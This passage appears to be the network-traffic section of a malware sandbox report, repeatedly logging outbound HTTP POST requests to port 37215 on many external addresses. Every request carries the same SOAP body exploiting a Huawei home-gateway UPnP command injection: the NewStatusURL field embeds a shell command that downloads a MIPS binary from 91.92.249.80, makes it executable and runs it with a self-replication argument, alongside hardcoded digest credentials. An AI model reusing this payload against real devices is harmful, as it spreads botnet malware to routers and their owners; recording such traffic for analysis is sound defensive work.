                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1791192.168.2.234788241.120.66.2737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543535948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1792192.168.2.2345146197.176.145.19837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543543100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1793192.168.2.2337898197.159.109.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543550014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1794192.168.2.233709241.157.68.12437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543562889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1795192.168.2.2346250197.237.221.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543565989 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1796192.168.2.235538441.75.122.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543587923 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1797192.168.2.234652441.180.2.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543591022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1798192.168.2.2345826157.149.249.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543612003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1799192.168.2.2337390197.173.240.22837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543612003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1800192.168.2.2350586157.169.219.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.543615103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
